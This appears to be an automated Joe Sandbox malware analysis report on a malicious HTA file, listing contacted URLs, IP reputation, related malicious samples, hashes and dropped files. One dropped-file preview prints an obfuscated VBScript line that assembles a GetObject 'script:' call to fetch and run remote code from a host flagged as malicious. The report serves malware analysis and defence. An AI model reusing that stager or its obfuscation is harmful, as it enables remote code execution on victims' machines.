                                                                                                                                                                                                          https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.pnggmshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=Efmshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://images-americanas.b2w.io/produtos/7211551574/imagens/sunga-masculina-adidas-3-listras/721155mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A95D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2533852956.000000000DD39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.americanas.com.br/categoria/bem-estar-sexual?chave=pfm_home_bemestarsexual_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727062236.000000000A851000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2716901409.0000000009A5C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700261943.0000000009A5A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.americanas.com.br/categoria/moveis/sofa?chave=pfm_hm_tt_1_0_sofamshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751738546.000000000935D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009354000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670320438.000000000935A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666676210.000000000C132000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2677175292.000000000935B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://www.americanas.com.br/categoria/utilidades-domesticas?chave=pfm_home_ud_menumshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764473625.00000000092A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676815165.000000000AA24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744826440.000000000AA29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652668755.000000000AA1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668949528.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2775010969.000000000AA2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650675847.000000000A9FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676562635.000000000AA1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726884364.00000000092A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensamshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2647607902.000000000C305000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2747376741.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2746776298.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748881120.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657340693.00000000092CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667279344.00000000092D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777141296.000000000C306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666265596.00000000092CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupommshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htafalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          172.217.19.194
                                                                                                                                                                                                                          securepubads.g.doubleclick.netUnited States
                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                          16.12.1.68
                                                                                                                                                                                                                          s3-sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                          16.12.2.2
                                                                                                                                                                                                                          s3-r-w.sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                          92.205.57.102
                                                                                                                                                                                                                          102.57.205.92.host.secureserver.netGermany
                                                                                                                                                                                                                          8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1579831
                                                                                                                                                                                                                          Start date and time:2024-12-23 10:32:23 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 5m 53s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Run name:Potential for more IOCs and behavior
                                                                                                                                                                                                                          Number of analysed new started processes analysed:13
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal76.evad.winHTA@17/54@8/4
                                                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                                                                                                          • Number of executed functions: 115
                                                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .hta
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.17.40, 95.101.110.61, 95.101.110.32, 13.107.246.63, 20.12.23.50, 184.28.90.27
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): e96427.dscb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.googletagmanager.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, sni-wildsan.b2wdigital.com.edgekey.net, static.criteo.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Execution Graph export aborted for target mshta.exe, PID 3416 because there are no executed function
                                                                                                                                                                                                                          • Execution Graph export aborted for target wscript.exe, PID 6428 because there are no executed function
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • VT rate limit hit for: Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          04:33:56API Interceptor2x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          92.205.57.102Factura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            102.57.205.92.host.secureserver.netFactura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            s3-r-w.sa-east-1.amazonaws.comdecrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 52.95.163.36
                                                                                                                                                                                                                            decrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.62
                                                                                                                                                                                                                            appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.234.32
                                                                                                                                                                                                                            appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.233.174
                                                                                                                                                                                                                            00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.232.137
                                                                                                                                                                                                                            00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.14
                                                                                                                                                                                                                            0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.232.21
                                                                                                                                                                                                                            0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.234.1
                                                                                                                                                                                                                            0923840932020004-3-0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 3.5.232.185
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            GD-EMEA-DC-SXB1DEhmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 188.138.99.78
                                                                                                                                                                                                                            https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 92.205.22.61
                                                                                                                                                                                                                            236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 91.250.85.177
                                                                                                                                                                                                                            bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 85.25.248.167
                                                                                                                                                                                                                            bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 85.25.248.111
                                                                                                                                                                                                                            bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 62.138.132.153
                                                                                                                                                                                                                            armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 62.75.161.26
                                                                                                                                                                                                                            IGz.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 62.138.26.111
                                                                                                                                                                                                                            jade.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                            • 85.25.248.132
                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eRef#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                            • 16.12.1.68
                                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                            • 16.12.2.2
                                                                                                                                                                                                                            • 172.217.19.194
                                                                                                                                                                                                                            • 92.205.57.102
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):271
                                                                                                                                                                                                                            Entropy (8bit):5.250152930854115
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:kD7j1oPayjqEWXil1+UkTdGk69ukJyrUXHht8XOcHv5n:k3j0jqEWMMv5ksr4hov5
                                                                                                                                                                                                                            MD5:05F88C21A3B62133641D007516237440
                                                                                                                                                                                                                            SHA1:8932D42C5ABC16091EE9D1F5CC99BBF992E9552F
                                                                                                                                                                                                                            SHA-256:2F0A789567FA67B2429FA528EC95CE9FCADEB9DF1B78636B2BBBD6F51EC8EF26
                                                                                                                                                                                                                            SHA-512:97BFFDD1AC98D5F79112E10F67F1A6BC64F79FD18B448199DECCA6F8C722FECCE719725C0B8A5809E878AFA929BE61C630E35F3F429B9FE58C11848518E3A6E2
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Preview:OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetObject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):49120
                                                                                                                                                                                                                            Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Ztt:T
                                                                                                                                                                                                                            MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                                                            SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                                                            SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                                                            SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 324, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):219607
                                                                                                                                                                                                                            Entropy (8bit):7.995126654677858
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:3072:JQZzvI4lMRvJSGyQATDA0imIA1YY20evyJAnhtmMxpd9uyT87cyqR8PkocEhjcq:J6yvGQ0i+FAneM19HtRVEhjj
                                                                                                                                                                                                                            MD5:BF072C6777FA104E9B1F7A54E7516B41
                                                                                                                                                                                                                            SHA1:1AF2A3DF1A1E5CDF79264714BB6A99A7E46C8440
                                                                                                                                                                                                                            SHA-256:7B52EAED3F13E8B73FC13F425A6F9D25B3C98650D88ED6D44B6A6F60438B7934
                                                                                                                                                                                                                            SHA-512:F88CC4F15D0F72CB0081BABEADEE1043908F189FEC30283834713BBE8C7EE47E9006FD2F93AC0F2835CD23557E107C3D24CBFF1D2636798B742FFA974C55347E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......D.............pHYs............... .IDATx....Z....s.n.{.s...WYI&..T.E#.RBEIH...P.<....p......$$D..%.((A!T..YYYPM..9{..Fc{...#.bEcG8.....b........C.*........d.m....kU;..Xu.../...4..nk....6.....J.....n{..h^.>..S../...}....hz.V._.L..n.M..]..U..:..-...C.s.nw............;.........ek=.Y=T.M......r.ue....l*.....qs.~k.6..5..}......m....:.(...-..l.m%..~....y<.l.|L.{U1_.o"..V...#.F....u....X.8.OZ}.....p......Uv[.e..Z?.}.`..+...maW...e.).o.c.#.:t...:..C.v....q.....KM.|lq...x..hNm...3...6.rEX..M.u.y_..uG.Gjn...#...n...,sYM.3e.]..l.:J.e.s.mR.5a'.....*U.vu.)...sAS&{.....+.. ^&......F..^..6.$.Wo.8.>...2...;,d.O....;.P..stW.qp......j...M.r.v.......vj4.......l.3.*.Z...s..\=.....m.<....m".v]$l.i.R...u.(..<1w.m..{.z.XXm'.....eo..l{-.I.....|.C..S.U..~..b.an6'?wm..%t6.....2=u':t8#t.........O{...}p.u.....a[/...M........:~c.Q...N..|y....}...U[..Y.M.m:9.m.XE...K2M['d.a...v..[u......o............x..6..:..|L..F.ol.]p*.w......
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):7359
                                                                                                                                                                                                                            Entropy (8bit):7.930889120298135
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:RSTlH2AgwJpC8EbBb0hFfoywVUNub9HDpclnoHhiX:4T/gifE1OxwVUNl
                                                                                                                                                                                                                            MD5:6103CD3C87A8B6BE092FB8571DA0FA4E
                                                                                                                                                                                                                            SHA1:9CB61811CD4DA849D5E734F0581101A9D7BDAB0F
                                                                                                                                                                                                                            SHA-256:05B2339E130BBA9F5700602565BFBE9F75CAEA3D95E7D113887159E38479A62D
